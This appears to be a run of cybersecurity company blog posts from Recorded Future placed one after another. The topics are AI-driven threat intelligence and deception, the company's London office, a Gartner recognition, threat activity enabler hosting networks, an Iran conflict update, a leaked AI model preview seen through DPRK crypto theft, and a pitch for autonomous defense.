Traditional detection systems correlate events against rules. AI models can reason about events holistically, synthesising partial logs, ambiguous telemetry, and unusual configuration changes into a judgment that approximates what a senior analyst would conclude. Crucially, this reasoning can be informed by threat intelligence: not just “is this anomalous?” but “is this consistent with the tradecraft of groups known to target us?” That contextual layer makes detection both more accurate and more relevant.

5. Continuous Attack-Path Modelling

Historically, understanding one’s own exposure was a periodic exercise: run a penetration test, receive a report, remediate, repeat. AI enables a living model of the environment that continuously re-evaluates exploitable paths to critical assets as conditions change. When this model is enriched with threat intelligence — particularly information about which attack paths adversaries actually favour, and which tools they use to traverse them — the result is a dynamic, threat-informed view of exposure that stays up to date automatically, not only when your manual pen testers or red team have time to update it.

6. Adversarial Prediction During Active Incidents

During an active incident, experienced responders draw on their knowledge of attacker behaviour to anticipate likely next moves. AI models trained on threat intelligence and historical incident data can encode this reasoning and make it available to any response team. If the model recognises that the observed initial access technique and lateral movement pattern are consistent with a known adversary group, it can predict likely next steps — which credentials they will target, which persistence mechanisms they prefer, which data they are likely to exfiltrate — and help defenders get ahead of the intrusion rather than simply reacting to each new indicator.

Turning the Tables: AI-Enabled Deception

The capabilities described above are fundamentally defensive: detecting, predicting, and prioritising. But the convergence of AI and threat intelligence also opens a qualitatively different category of action — using intelligence about the attacker to actively mislead them.

From Static Honeypots to Adaptive Deception

Deception technologies such as honeypots and honeytokens have existed for decades, but they have always been constrained by how static and labour-intensive they are to deploy convincingly. A skilled attacker can often identify a honeypot by its lack of realistic activity, stale data, or inconsistencies with the surrounding environment. AI removes these constraints. AI-generated deception environments can include realistic-looking decoy infrastructure — fake services, plausible file shares, synthetic credentials, even simulated user activity patterns — that adapts dynamically in response to attacker behaviour. Rather than a static trap that a competent adversary recognises and avoids, the defender can maintain a deception layer that evolves to stay convincing.

Intelligence-Informed Decoy Placement

This capability ties directly into the threat intelligence fusion described above. If you know which TTPs a likely adversary uses, which attack paths they favour, and where your real weaknesses are, AI can place decoys precisely along the routes those adversaries are most likely to take. The deception is no longer generic; it is tailored to the specific threat. A decoy credential can mimic the type of service account the adversary’s tooling is known to target. A fake file share can contain documents plausible enough to absorb attacker time and attention, and simultaneously provide new intelligence about the adversary. The threat intelligence that informs your defensive posture simultaneously informs your deception strategy. This is “Machine Counter Intelligence”!

Imposing Costs and Eroding Attacker Confidence

AI-generated deception at scale inverts a piece of the traditional asymmetry. Attackers who encounter a pervasive deception layer must spend significant time and effort distinguishing real assets from fake ones. Every interaction with a decoy wastes their resources, degrades their confidence in the intelligence they have gathered, and increases the risk that they will trigger an alert. In effect, the attacker now faces a version of the defender’s dilemma: they must verify everything, while the defender only needs one decoy to succeed.

Active Intelligence Collection Through Engagement

Perhaps most significantly, AI can interact with attackers inside deception environments in ways that feel plausible, drawing out more of their tooling, techniques, and objectives. This turns deception from a passive tripwire into an active intelligence-gathering operation. The tradecraft revealed through these engagements feeds back into the threat intelligence cycle, improving the defender’s understanding of the adversary and refining future defensive and deceptive measures. The result is a virtuous loop: intelligence informs deception, deception generates new intelligence.

There is an inherent tension in active deception engagement: traditional incident response doctrine prioritises minimising dwell time, while deception-based intelligence collection deliberately extends it. The risks are real — containment failure if the deception boundary isn't airtight, resource cost of sustained monitoring, potential legal and regulatory questions about why an attacker was permitted to remain active, and the possibility that a sophisticated adversary recognises the deception and feeds false signals back to poison your intelligence. These risks do not invalidate the approach, but they define the conditions under which it works. Active engagement requires genuinely isolated deception infrastructure, and clear decision frameworks for when to engage.

Democratising Access to Intelligence-Driven Defense

A less obvious but structurally significant change is that AI lowers the barrier to performing intelligence-driven defense. When an analyst can query in plain language — “which of our externally-facing systems are vulnerable to techniques used by a certain threat group in the last 90 days?” — and receive an accurate, contextualised answer, the skill requirement for effective threat-informed defense drops substantially. This is not doing an old thing faster; it is enabling a different operating model in which threat intelligence becomes a working tool for the entire security team, not just the analysts who specialise in it.

Strategic Implications

The most profound implication is that defenders have historically been reactive because they lacked the cognitive bandwidth to continuously fuse offensive intelligence with their own exposure data. AI makes this fusion not only possible but economically viable for organisations that could never previously afford dedicated threat intelligence teams, red teams, and continuous assessment programmes.

This changes the nature of the defender’s dilemma. The traditional framing — “defenders must protect everything; attackers only need one way in” — assumed that defenders could not know, in real time, which parts of their attack surface are most likely to be targeted. AI-enabled threat intelligence fusion challenges that assumption. If defenders can continuously identify the most probable attack paths based on current adversary behaviour and their own specific weaknesses, they can concentrate resources where they matter most. The dilemma does not disappear, but the defender is no longer operating blindly, but can take control.

The key asymmetry is therefore shifting from “attacker versus defender” to “AI-augmented versus non-augmented.” Organisations that integrate AI with robust threat intelligence programmes may find themselves closer to parity with attackers than at any point in the history of the field. Those that do not will face an even steeper version of the traditional dilemma, as AI-empowered adversaries exploit the widening gap.

Final Words

The emergence of fully autonomous AI agents on both sides raises unresolved questions. If attackers deploy autonomous offensive agents that can chain exploits and adapt to defenses without human guidance, defenders will need equally autonomous systems — systems that consume threat intelligence, assess exposure, and act on the results without waiting for human approval. The governance, trust, and control challenges this creates are substantial, but the journey towards this goal must begin now.

There is also a risk that the intelligence-AI feedback loop becomes adversarial in new ways. Sophisticated attackers who understand that defenders are using AI to map TTPs against exposure may deliberately vary their tradecraft to evade predictive models, or generate false signals to misdirect AI-driven defense. The quality and provenance of threat intelligence will become even more critical as AI amplifies both its value and the consequences of acting on flawed data — we need automation-grade intelligence!

We have not changed the basic equation: defenders must still know and mitigate every weakness, while the attacker needs only one. AI does not abolish that asymmetry, and claiming otherwise would be dishonest. What AI fused with threat intelligence does is change the terms of the contest. Instead of defending blind — treating every weakness as equally likely to be exploited — defenders can now continuously map attacker capabilities against their own specific exposure, concentrate resources on the paths adversaries actually use, and impose real friction through deception that degrades the attacker's speed advantage. The attacker still only needs one weakness, but they are now searching for it in an environment that fights back: one that predicts where they will look, places convincing traps along those paths, and learns from every encounter.

The defender may never achieve dominance, but the era of structural helplessness — of knowing that the asymmetry is permanent and unmanageable — is ending for organisations willing to invest in these capabilities. Parity in an adversarial contest is not a consolation prize; it is the condition under which skill, preparation, and operational discipline start to matter more than structural advantage.

There’s a certain energy you can only find at Recorded Future. Take that energy and bring it to London’s “Silicon Roundabout” and you get the perfect spot for Futurists to build and innovate.

Recorded Future's office @ The Bower on Old Street. Source: https://www.theboweroldst.com/

Across the globe, Recorded Future is 1000+ employees working towards the same mission: Securing Our World With Intelligence.

Our London office – one of our most storied hubs – hosts a range of departments supporting both local, regional, and global operations. The office brings together 100+ cross-functional professionals from People & Talent Acquisition, Finance, Sales, Marketing, Global Services, Research, and more!

Looking back: From the Attic to The Bower

Our story in London didn’t start in the high-rise, but in a converted attic with just a handful of people and a big mission.

This passion for building something great fueled incredible growth. Sam Pullen, Director of Intelligence Services, remembers when the entire EMEA team was just about 20 people. Since 2018, we’ve gone from service a few dozen customers in the region to ~700 now.

On the left: First Recorded Future office in London. On the right: Recorded Future's newest office

On the left: First Recorded Future office in London. On the right: Recorded Future's newest office

Inside the Office

This modern high-rise building’s open-plan layout offers quite a few collaboration spaces across our office, where the team likes to have small team meetings, breaks, or even lunch.

Like all Recorded Future offices, our meeting rooms follow a unique naming convention. While Boston uses countries, and Sweden volcanoes - London chose islands. Rumors say we picked islands following a 95-day rain streak – we can neither confirm nor deny. So, in our London office, you’ll find Futurists collaborating in rooms like Bora Bora, Crete, and even San Andres.

Our Culture

What truly defines our London office is the sense of camaraderie – whether that’s competing in a friendly team padel game, testing your dartboard skills, or truly memorable summer & end of year celebrations.

Whether over summer picnics and pedalos in Hyde Park years, playing 5-a-side football in the pouring rain, or at the most recent Christmas party at the Savoy - our Futurists celebrate wins together.

Friendly Team Padel Game at Canary Wharf

Onwards & Upwards: Why Recorded Future

We asked Sam and Joe what has been the highlight of their long tenure at Recorded Future: the opportunity to build. For Sam, it has been the opportunity to build great relationships with clients over nearly a decade. For Joe, it has been the opportunity to build new solutions and new ways to work towards our mission.

Ready for your next move? Join the team!

That’s why we’re honored to share that Gartner has named Recorded Future a Leader in the first-ever Magic Quadrant™ for Cyberthreat Intelligence Technologies. This new report evaluated 17 vendors in the space, providing a comprehensive look at the competitive landscape.

“In our view, being recognized as a Leader means something specific to us: we feel it reflects our ability to help our customers with the outcomes they depend on. These include stopping threats pre-attack, running intelligence autonomously at a scale no human team can match, and making every security control they own more effective," said Colin Mahony, CEO, Recorded Future. “We believe this recognition reflects both the trust our customers place in us and the strength of the outcomes we help them achieve.”

A research methodology that prioritizes customer voice

A Gartner Magic Quadrant is a culmination of research in a specific market, giving you a wide-angle view of the relative positions of the market’s competitors. By applying a graphical treatment and a uniform set of evaluation criteria, a Magic Quadrant helps you quickly ascertain how well technology providers are executing their stated visions and how well they are performing against Gartner’s market view.

For Recorded Future, this meant that Gartner analysts spoke directly with our customers about their real-world experiences—the challenges they face, how they use our Platform, and the outcomes they've realized. We feel their voices shaped our position in the Magic Quadrant, just as they’ve always shaped our product offerings and roadmap.

The new Gartner report offers a snapshot of what the analysts heard from customers. We haven’t stopped working since then and there’s much to talk about.

There’s more… the next phase of threat intelligence

In conversations throughout 2025, our customers gave us their thoughts about product complexity, pricing models, and the challenges of scaling intelligence across their teams. As a result of their input, we’ve fundamentally changed how they can access and make the most of Recorded Future threat intelligence.

Here are the highlights of our continued commitment to simplicity and innovation to provide better experiences for our customers in 2026:

1. Goodbye, modules. Hello, simplicity. Meet our four new solutions.
Our four new solution areas cover the four major attack surfaces—an organization’s systems, brand, supply chain, and payment methods:

• Cyber Operations—This foundational solution empowers security teams with the intelligence to monitor and prioritize threats and vulnerabilities, get in-depth malware insights, triage alerts and detect threats, and stand up an intelligence-driven defense.
• Digital Risk Protection—Also foundational, this solution allows teams to monitor malicious sites, code repositories, and the dark web to detect brand abuse, employee credential compromise, and other threats to digital trust.
• Third-Party Risk—This solution enables teams to continuously assess supplier security posture with real-time intelligence, accurate risk ratings, vendor action plans, and more.
• Payment Fraud—With this solution, teams can detect and prevent card-not-present fraud with intelligence that identifies compromised payment data before it's used.

The solutions are built on a unified intelligence foundation to provide consistency, accuracy, and alignment around shared security outcomes. And they integrate with other security solutions like CrowdStrike Falcon and Google SecOps, bringing the benefits of Recorded Future intelligence and rich context directly into common SIEM and EDR workflows.

2. New pricing packages for less friction, more intelligence
We’re offering the four solutions in new pricing packages designed to fit customer needs:

• Simplicity—Customers can purchase one package instead of juggling multiple modules
• End-to-end workflows—Packages cover full use cases, complete with the key capabilities to get the job done
• Wider access—Higher tiers offer unlimited seats, so everyone now can be intelligence-led.

In addition, integrations are included. Now your tools in the security stack—SIEM, SOAR, firewall, endpoint protection, ticketing system, and more—can leverage Recorded Future intelligence without integration fees or limitations.

3. Expansion into Latin America
The threat landscape knows no geographical borders, and neither do we. We’ve expanded Recorded Future’s operations into Latin America, giving security teams in the region better access to the expertise and support they need to mount a successful proactive defense.

4. Autonomous Threat Operations for autonomous defense
In February, we launched Autonomous Threat Operations to help customers move from isolated threat intelligence insights and manual workflows to automated and continuous defensive actions across the entire security ecosystem. Complete with AI-powered, 24/7 autonomous threat hunting and multi-source correlation in the Intelligence Graph®.

As we continue to build on our vision of moving from automated to autonomous operations, we’re developing Recorded Future AI and agentic experiences to help our customers reduce alert fatigue, save time on research, and run threat hunts faster so they can detect and defend at scale.

Explore the Gartner Magic Quadrant report today

We’re proud to be recognized by Gartner as a Leader in Cyberthreat Intelligence Technology, and we’ll continue innovating for our customers to help them mitigate risk and stay ahead of evolving threats.

Get the report to review Gartner analysis and see how Recorded Future fits your CTI program needs.

____________________________________________________________________________________________________________________________________

Gartner, Magic Quadrant for Cyberthreat Intelligence Technologies, By Jonathan Nunez, Carlos De Sola Caraballo, Jaime Anderson, 04 May 2026.

Gartner and Magic Quadrant are trademarks of Gartner, Inc. and/or its affiliates.

Gartner does not endorse any company, vendor, product or service depicted in its publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner publications consist of the opinions of Gartner’s business and technology insights organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this publication, including any warranties of merchantability or fitness for a particular purpose.

Behind every ransomware demand, botnet, or threat activity group is a server sitting in a data center. While most legitimate hosting providers evict threat actors once identified, a specific class of providers does the opposite. Recorded Future^® calls these providers threat activity enablers(TAEs).

What Is a Threat Activity Enabler?

Figure 1: Overview of threat activity enablers’ patterns, ecosystem, and impact

A threat activity enabler (TAE) is an individual, organization, or service provider that supports malicious cyber activity by providing infrastructure or services leveraged by threat actors. More commonly, this includes providers that lack a formal physical or virtual storefront, conduct business only via email or messaging platforms, and do not enforce know-your-customer (KYC) policies. It also includes hosting providers that selectively respond to abuse reports or law enforcement inquiries to maintain plausible deniability, as well as more traditional self-proclaimed “bulletproof” providers that openly ignore oversight or advertise non-cooperation.

TAE networks serve as the backbone for ransomware groups, infostealer campaigns, botnets, and even state-sponsored threat actor operations. What distinguishes TAE networks is the sustained concentration of malicious infrastructure within their networks.

How TAEs Operate

TAEs are masters of obfuscation and are highly resilient, hiding behind layers of decoy companies to evade accountability. They use several core tactics:

• Corporate Shell Games: They establish front companies across multiple jurisdictions to create legal distance between the infrastructure and the operators.
• Strategic Resource Control: They often operate as local internet registries (LIRs). This gives them direct control over IP resources and autonomous systems (ASNs), allowing them to manipulate network resources at will.
• Rapid Rebranding: When a network becomes too "hot" due to scrutiny, TAEs rapidly transfer IP address prefixes to a newly registered, clean-looking entity.

Identifying High-Risk TAE Networks

Recorded Future actively identifies high-risk TAE networks through its Network Threat Density List. These networks are ranked by their Threat Density Score, calculated from the concentration of validated malicious activity relative to the total number of IP address prefixes a network announces.

This approach cuts through the noise to quickly expose infrastructure that is disproportionately associated with threat activity, a core characteristic of TAEs, allowing network defenders to prioritize the infrastructure most likely to pose material risk.

Figure 2: High-risk suspected or confirmed TAE networks in 2025, ranked by Threat Density Score

From Insight to Action

Tracking TAE networks allows security teams to move from reacting to individual threats to proactively managing infrastructure risk. In practice, this means applying TAE intelligence across three core areas: prevention, detection, and exposure.

Operationalize TAE Intelligence

Figure 3: Three steps for operationalizing TAE intelligence

TAEs are persistent and continuously evolving, adapting quickly in response to sanctions, enforcement actions, and exposure. While their identities may change, their underlying infrastructure patterns often remain consistent.

The "metaspinner" Case Study

In April 2025, a TAE tracked by Recorded Future, Virtualine Technologies, shifted its IPv4 resources to a newly registered network that fraudulently impersonated a legitimate German software firm, metaspinner net GmbH. Because this provider’s historical infrastructure patterns were already being tracked, the newly created network was immediately identified as a front. Within weeks, this network became a primary distribution hub for malware families such as Latrodectus and AsyncRAT. When the operation was eventually exposed, Virtualine Technologies simply pivoted the infrastructure to a new identity within one of its existing autonomous systems to maintain its operations.

Figure 4: Validated malicious activity associated with Virtualine Technologies in 2025

This case underscores the reality of TAE networks: while identities, ownership records, and corporate fronts may change, the underlying infrastructure and its associated risk persist, making continuous tracking essential to identifying and prioritizing the networks that will drive future threat activity, as demonstrated by Virtualine subsequently emerging as the highest-risk TAE network in 2025.

The Stark Industries Case Study

In May 2025, the European Union sanctioned UK-registered hosting provider Stark Industries Solutions and its executives for enabling Russian state-sponsored cyber operations. However, enforcement did not halt Stark Industries’ operations. In the weeks leading up to the sanctions announcement, Stark Industries began transferring IP resources, modifying RIPE registrations, and shifting infrastructure to affiliated entities.

Figure 5: Timeline of Stark Industries-related events in 2025

Despite the sanctions, the underlying infrastructure, routing relationships, and operational patterns remained traceable across these new fronts. Continuous monitoring of TAE ecosystems enables defenders to detect these pivots in near real time, revealing continuity beneath corporate rebrands and legal restructurings. This case underscores a broader reality: sanctions may change names and ownership records, but without infrastructure-level visibility, the enabling networks behind malicious activity often persist.

What This Means for Security Leaders

TAEs represent an ongoing challenge. While individual campaigns and threat actors may come and go, the infrastructure that supports them remains adaptive and deliberately resilient.

For security leaders, this requires an additional shift from solely reacting to individual indicators to understanding and prioritizing the infrastructure that enables threat activity at scale. By identifying and tracking high-risk networks, organizations can reduce investigative noise, focus resources on the most impactful threats, and take proactive steps to limit exposure before attacks materialize.

Ultimately, addressing TAEs is not just about detection; it’s also about disrupting the conditions that enable modern cyber threats to operate.

Questions You Should Be Asking

• How much of your network communicates with high-risk infrastructure?
• Are you prioritizing alerts involving high-risk networks?
• Is TAE or ASN risk intelligence integrated into your detection and triage workflows to ensure the highest-risk activity is addressed first?
• Do any of your third-party providers rely on TAE-linked infrastructure?
• Do you have hidden exposure to TAE networks?
• Are your controls dynamically adjusting to infrastructure risk?
• Can you proactively restrict or challenge traffic to and from high-risk networks?

This report is updated as the situation evolves across the geopolitical, cyber, and influence operations dimensions of this conflict. It will be of greatest interest to organizations in the US, Israel, and Gulf states concerned about targeting by Iranian state-sponsored or state-aligned threat actors, as well as those with exposure to energy markets, maritime shipping, and critical infrastructure potentially impacted by regional escalation.

The Latest Updates

Geopolitical Landscape

• Iran’s hardliners are driving strategic deadlock, blockade resilience, and Strait closure. Insikt Group assesses Iran’s calculus is very likely shaped by IRGC influence and hardliner dominance: Supreme Leader Khamenei’s April 30 statement frames Iranian control of the Strait of Hormuz as a post-American regional order, chief negotiator Ghalibaf has reportedly resigned after a reprimand for raising nuclear issues in talks, and Iran’s public position has converged on a single precondition — the US must lift its naval blockade before negotiations can resume.
• The US blockade has cut Iranian oil exports by ~70% but has not achieved its strategic objectives. Iran faces critical oil storage constraints — Bloomberg reported 22 days or less of unused capacity as of April 27 — yet Insikt Group assesses Iran can very likely survive the current pressure level, and the full financial blow will lag three to four months as ~130 million barrels already loaded before the blockade remain in transit.
• Maritime standoff deepens as Iran seizes vessels, lays additional mines, and ceasefire talks stall. Following the US seizure of the Touska, the IRGC seized the MSC Francesca and Epaminondes and fired on a third vessel transiting the Strait; the IRGC reportedly dropped additional mines during the final week of April, and the Pentagon assesses mine-clearing could take up to six months after a formal end to hostilities.

Mythos was meant to be contained. Within hours of the public Project Glasswing announcement, a third-party contractor environment became the access vector. Not because Anthropic did something wrong. Because controlled release, at the scale modern enterprise software operates, is a goal rather than a guarantee.

The interesting question isn’t who got in this time. It’s who gets in next, and their economics.

What happened?

The group accessed Mythos the same day it was announced, guessing the endpoint based on Anthropic’s naming conventions for prior models. The vector was an individual employed at a third-party contractor, not Anthropic’s core infrastructure. Source characterizations point to a research community “not wreaking havoc” with the model.

The misread

If the coverage only centers on Anthropic’s security posture or the AI safety debate, we’re missing an important angle.

The structural signal is that any preview or controlled-access model release has porous boundaries by design. Access controls on paper (contracts, NDAs, approved vendor lists) differ from those in practice. Every partner brings their own contractors, endpoints, and people with legitimate credentials and uneven security hygiene. That is the real control surface, not the cryptographic perimeter around the model itself. Which makes this a supply chain problem that happens to be about AI, not an AI problem that happens to involve vendors.

The blind spot

AI policy discourse is locked on US versus China, including energy, chip controls, export rules, sovereign AI posture, and who wins the race.

Structurally missing from the larger conversation is the one state actor whose entire foreign currency revenue stream is cyber-enabled theft. DPRK doesn’t need to win any race. They need a 20-30% productivity gain in existing operations.

The pipeline is documented. Insikt Group’s Crypto Country estimated that regime-linked cryptocurrency theft reached roughly $3 billion through 2023. The Multilateral Sanctions Monitoring Team (successor to the UN Panel of Experts after Russia’s 2024 veto) has since done the harder primary work. MSMT’s October 2025 report documents $2.8 billion stolen from cryptocurrency companies between January 2024 and September 2025 across more than 40 heists, with proceeds explicitly tied to WMD and ballistic missile program funding. The State Department updated the tally in January 2026: another $400 million stolen in the three months since publication, bringing the 2025 totals above $2 billion.

Every successful crypto exchange intrusion ends up on a launch pad.

Why North Korea wants the next model

Crypto exchange intrusions are labor-intensive at every phase. Recon, social engineering at scale (fake developer personas on GitHub and LinkedIn, spear-phishing of individual engineers at wallet providers), credential harvesting, post-exploit lateral movement, key extraction, and laundering.

Agentic capability compresses the cycle to include the same operator-hours, more successful intrusions, and more stolen $$$ per operator.

Bybit is an easy example. The FBI attributed approximately $1.5 billion in stolen virtual assets to TraderTraitor in February 2025. The intrusion chain ran months of patient targeting against a single Safe{Wallet} system administrator via phishing, followed by post-compromise operational patience. These types of attacks are expensive, time-intensive, and still extraordinarily productive.

Lazarus and TraderTraitor don’t need AGI. They need the productivity lift that turns a junior operator into a senior one and shaves weeks off the planning phase. It doesn’t have to be Mythos specifically. Any comparable capability through a comparable vector does the job.

Better tools mean more successful intrusions. More successful intrusions mean more stolen crypto. More stolen crypto means more missiles.

Three access patterns

Three different tradecraft patterns keep getting conflated in media coverage. They are not the same TTP, and treating them as one weakens the response on all three.

1. Contractor misuse. A legitimately credentialed employee at a third-party vendor uses their access for unauthorized purposes. This is the Mythos story. The credentials and access are real, though the intent is variable. Defenses (easy to say, hard to do well): telemetry, behavioral monitoring, and least-privilege scoping at the vendor tier.

2. Fraudulent hiring. An adversary places its own operatives inside the target through stolen or synthetic identities, often via remote IT contracting. This is the DPRK IT worker scheme. Insikt’s Inside the Scam documents PurpleBravo’s infrastructure: front companies in China spoofing legitimate IT firms, and a malware ecosystem (BeaverTail, InvisibleFerret, OtterCookie) targeting the cryptocurrency industry. The credentials are real, but the identities are fake. Defenses: identity verification at hire (in-person interviews to avoid AI tricks), ongoing personnel vetting, geographic and behavioral baselining.

3. Supply chain compromise. A trusted vendor’s systems get breached, and the attacker uses that vendor’s legitimate distribution channel to reach the real target. TeamPCP’s March 2026 LiteLLM compromise hit the AI toolchain directly, poisoning Trivy (a defensive security scanner) to reach a package with 95 million monthly downloads. Defenses: build-pipeline integrity, dependency monitoring, signed artifacts.

These three attack vectors converge on the same truth. Any preview or limited-release AI program that depends on third parties is exposed to all three vectors simultaneously. DPRK is the actor most motivated across the full triangle because the revenue case is specific, measurable, and directly beneficial for the regime. They are incentivized to be “AI native.”

So what?

In the security industry, we need to stop thinking about AI access as purely a lab problem when it’s also a sanctions problem. The great-power competition framing obscures the actor already online, with a rich history of monetizing cyber heists to fund missiles.

“Limited release” is a wonderful bumper sticker. The AI reality, from a threat-modeling perspective, is a countdown to turbo-charging adversarial capabilities.

Now what?

The honest conversation is that perimeter-style AI “controlled access” is less effective against State-sponsored adversaries. A productive security path is a distinct preview infrastructure, aggressive telemetry, canaries, and third-party access tied to personnel-level vetting rather than contractual attestation. (Guessable endpoints should be the first thing dead.)

Crypto exchanges and custodians: your threat model needs to anticipate what Lazarus can do 3 to 6 months from now, not what they did last quarter. Assume they improve faster than your defenses do.

Policymakers: DPRK is a first-class entity in AI access governance. The Multilateral Sanctions Monitoring Team framework already documents cyber-enabled sanctions evasion thoroughly. What it doesn’t yet do is name AI capability access as a sanctions-relevant category. Dual-use export controls have governed the transfer of semiconductor and missile technology for decades. AI capability is the obvious next category.

Corporate CISOs (outside the AI-lab orbit): your third-party contractor environments are now inside the AI capability threat surface, whether you opted in or not. Inventory accordingly.

Close

Mythos is a preview of an access pattern. Any actor whose business model is stealing money to build weapons will find the third-party seam. This time, it was hobbyists. DPRK has spent two decades proving why nonproliferation is the right frame here.

• The real challenge in cybersecurity isn’t intelligence or visibility, it’s speed. Attackers operate at machine speed, while most organizations are still constrained by manual, human-driven workflows.
• Traditional threat intelligence falls short because it stops at insight. To reduce risk effectively, intelligence must not only inform decisions but also actively drive response.
• Fragmentation across cyber, fraud, and third-party risk creates exploitable gaps. A unified, intelligence-driven approach is essential to understanding and addressing modern threats holistically.
• Autonomous defense is the path forward. By enabling continuous, real-time action across the attack surface, organizations can close the speed gap and move from reactive security to proactive risk reduction.

For most security teams today, volume and access to intelligence isn’t the problem. It’s the speed at which they can turn that intelligence into action.

Over the last decade, organizations have invested heavily in threat intelligence and cybersecurity. Global security spending has surged past $200 billion annually, growing double digits year over year, while security’s share of IT budgets has climbed from under 9% to more than 13%. Most CISOs report continued budget increases, and enterprises are making billion-dollar investments in intelligence capabilities.

And yet, breaches still happen. Fraud still slips through. Third-party risk still catches teams off guard. The issue isn’t visibility. It’s the growing gap between how fast threats move and how fast organizations can respond.

Attackers now operate at machine speed, leveraging automation and AI to identify vulnerabilities, launch campaigns, and exploit opportunities in real time. Most security teams, however, are still constrained by manual workflows, fragmented systems, and processes that require human intervention at every step. That mismatch is where risk can accumulate—and where even well-resourced teams fall behind.

The Hidden Cost of Human-Speed Security

For many organizations, this gap shows up in subtle but compounding ways. Analysts spend hours triaging alerts, trying to determine which signals actually matter. Security teams often discover incidents after damage has already occurred, not because the data wasn’t there, but because it couldn’t be acted on quickly enough. Across the organization, teams responsible for cyber operations, fraud, and third-party risk operate in silos, each with their own tools and workflows, rarely sharing a unified view of risk.

At the same time, expectations from leadership have shifted. Executives and boards no longer want activity metrics—they want clear evidence that security investments are reducing business risk. But when intelligence is not clearly connected to action from security teams, that proof becomes difficult to deliver.

Traditional threat intelligence was designed to inform decisions made by humans, at human speed. In today’s environment, that model introduces delay. And delay, in cybersecurity, is increasingly indistinguishable from exposure.

Intelligence That Acts, Not Just Informs

Closing the speed gap requires more than incremental improvements. It requires a shift in how organizations think about intelligence altogether. Moving forward, the future of cybersecurity must be more than just intelligence-led—it must be intelligence-acted.

In this model, intelligence doesn’t sit in dashboards waiting for analysts to interpret it. It continuously correlates signals, prioritizes what matters, and drives action across the security environment automatically. Instead of asking teams to move faster, it enables the entire system to operate at the speed of the threat.

This is the foundation of autonomous defense, and it’s the future of effective, machine-speed cybersecurity.

From Reactive to Autonomous: A New Operating Model

Autonomous defense fundamentally changes the role of the security team. Rather than serving as the bottleneck between detection and response, analysts become decision-makers operating on top of continuously running intelligence.

Recorded Future’s Autonomous Threat Operations brings this model to life by eliminating the manual steps that slow teams down. It ingests and correlates intelligence from multiple sources, applies context in real time, and triggers actions across existing security tools—all without requiring constant human input.

The impact of such a dramatic shift is immediate and measurable. Threat hunting becomes continuous instead of periodic. Alerts arrive enriched with context, reducing the time needed to investigate and respond. Detection and remediation workflows execute automatically, freeing analysts to focus on strategic threats rather than routine triage.

Just as importantly, this approach transforms how organizations measure success. Instead of tracking activity—alerts processed, queries written, incidents reviewed—teams can demonstrate real outcomes: faster response times, reduced exposure, and a clearer connection between intelligence and risk reduction; the latter of which is becoming increasingly necessary for organizational buy-in.

This is so much more than just adding another tool to the stack. Instead, it’s about making every existing control smarter, faster, and more effective. And it’s paying off. On average, security teams using Recorded Future save up to 100 hours per week through improved analyst productivity, allowing teams to redirect effort toward threat hunting and proactive defense instead of repetitive manual analysis.

The Bigger Challenge: Fragmented Visibility Across the Attack Surface

Speed alone, however, is only part of the equation. Many organizations are also limited by how they view risk. Threats today don’t respect organizational boundaries. A phishing campaign can lead to credential theft, which can then be used to access systems, exploit third-party relationships, or enable fraudulent transactions. These events are connected, but still far too many organizations manage them in isolation.

Cyber operations teams focus on internal threats. Fraud teams monitor transactions. Risk teams assess vendors. Each group has visibility into part of the problem, but no one has a complete picture. This fragmentation creates blind spots, and attackers are increasingly skilled at navigating between them.

A Unified Approach to Risk

To effectively reduce risk, organizations need more than faster response times. They need a connected understanding of their entire attack surface, along with the ability to act across it in a coordinated way.

Recorded Future addresses this through four core solution areas—Cyber Operations, Digital Risk Protection, Third-Party Risk, and Payment Fraud Intelligence—all built on a single, integrated intelligence foundation.

In cyber operations, this means moving beyond alert overload to real-time prioritization. Instead of forcing analysts to sift through volumes of data, intelligence surfaces the threats that are most relevant to the organization’s environment and enables immediate action. The combination of prioritization and automation allows teams to reduce noise while improving both detection speed and response quality.

In digital risk protection, the focus shifts beyond the traditional perimeter. Today’s attackers target brands, customers, and executives just as frequently as they target infrastructure. By monitoring the open, deep, and dark web, Recorded Future provides visibility into impersonation campaigns, credential exposure, and emerging threats long before they impact the organization. More importantly, it enables rapid response, whether that means taking down fraudulent domains or preventing account takeover attempts.

Third-party risk represents another growing challenge. As organizations expand their ecosystems, they inherit risk from vendors and partners, often without real-time visibility. Third-party involvement in breaches has reached a staggering 30%, up from just 15% a year ago. Static assessments and periodic reviews can’t keep pace with how quickly vendor risk evolves today. Continuous monitoring, grounded in real-world intelligence, allows organizations to detect issues earlier, respond faster, and maintain a more accurate understanding of their exposure.

In the realm of payment fraud intelligence, the shift is equally significant. There were some 269 million records posted across dark and clear web platforms in 2024, and a tripling of certain e-skimmer infections. It’s important to keep in mind that fraud doesn’t begin at the moment of transaction. Rather, it begins much earlier, in the environments where stolen data is exchanged and tested. Recorded Future provides comprehensive coverage across the complete payment fraud lifecycle. Sophisticated cleanup and normalization techniques result in better data quality and richer data sets, reducing manual research and enabling high confidence mitigation actions. By identifying these signals upstream and intervening, organizations can stop fraud before it’s executed, reducing both financial loss and customer impact.

One Intelligence Foundation. Total Visibility.

What makes this approach fundamentally different is that these capabilities are not delivered as isolated solutions. They are unified through the Recorded Future Intelligence Platform, which correlates data across millions of sources and billions of entities to provide a single, coherent view of risk.

This unified foundation enables organizations to connect signals that would otherwise remain siloed. Threat actors, infrastructure, vulnerabilities, and campaigns are all linked, allowing teams to understand not just what is happening, but what is likely to happen next.

That level of visibility is what makes autonomous defense possible. And not just within a single domain, but across the entire attack surface.

The urgency behind this shift cannot be overstated. Attackers are already operating at machine speed, using automation to scale their efforts and reduce the time between discovery and exploitation. At the same time, organizations that rely on manual processes are finding it increasingly difficult to keep up.

The consequences of this gap are significant. Longer dwell times allow attackers to entrench themselves more deeply. Delayed responses increase the cost and impact of incidents. And as breaches and fraud events become more visible, customer trust becomes harder to maintain.

This is no longer a question of optimization. It’s a question of whether existing operating models can keep pace with the reality of modern threats.

Rethinking What Threat Intelligence Should Do

As organizations evaluate their approach to cybersecurity, the role of threat intelligence needs to be reconsidered. It is no longer enough for intelligence to provide visibility. It must enable action. It must operate in real time. And it must extend across the full scope of organizational risk—not just one domain at a time.

Equally important, it must deliver outcomes that matter to the business. Faster detection, reduced exposure, and measurable risk reduction are no longer aspirational. They are essential for enterprise security in the modern, AI-powered threat landscape.

